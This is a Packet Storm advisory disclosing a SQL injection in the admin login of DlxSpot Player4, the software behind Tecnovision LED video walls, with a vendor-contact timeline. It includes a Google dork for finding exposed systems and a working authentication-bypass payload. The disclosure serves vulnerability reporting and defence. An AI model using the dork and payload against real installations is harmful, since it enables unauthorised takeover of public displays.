DlxSpot SQL Injection

2017-09-19T00:00:00
ID PACKETSTORM:144257
Type packetstorm
Reporter Simon Brannstrom
Modified 2017-09-19T00:00:00

Description

                                        
                                            `# Exploit Title: DlxSpot - Player4 LED video wall - Admin Interface SQL  
Injection  
# Google Dork: "DlxSpot - Player4"  
# Date: 2017-05-14  
# Discoverer: Simon Brannstrom  
# Authors Website: https://unknownpwn.github.io/  
# Vendor Homepage: http://www.tecnovision.com/  
# Software Link: n/a  
# Version: >1.5.10  
# Tested on: Linux  
# About: DlxSpot is the software controlling Tecnovision LED Video Walls  
all over the world, they are used in football arenas, concert halls,  
shopping malls, as roadsigns etc.  
# CVE: CVE-2017-12930  
# Linked CVE's: CVE-2017-12928, CVE-2017-12929  
  
# Visit my github page at  
https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md  
for complete takeover of the box, from SQLi to full root access.  
###############################################################################################################################  
  
DlxSpot Player 4 above version 1.5.10 suffers from an SQL injection  
vulnerability in the admin interface login and is exploitable the following  
way:  
  
username:admin  
password:x' or 'x'='x  
  
TIMELINE:  
2017-05-14 - Discovery of vulnerabilities.  
2017-05-15 - Contacted Tecnovision through contact form on manufacturer  
homepage.  
2017-06-01 - No response, tried contacting again through several contact  
forms on homepage.  
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE)  
requesting CVE assignment.  
2017-08-17 - Three CVE's assigned for the vulnerabilities found.  
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an  
email in Italian to the company.  
2017-09-18 - No response, full public disclosure.  
`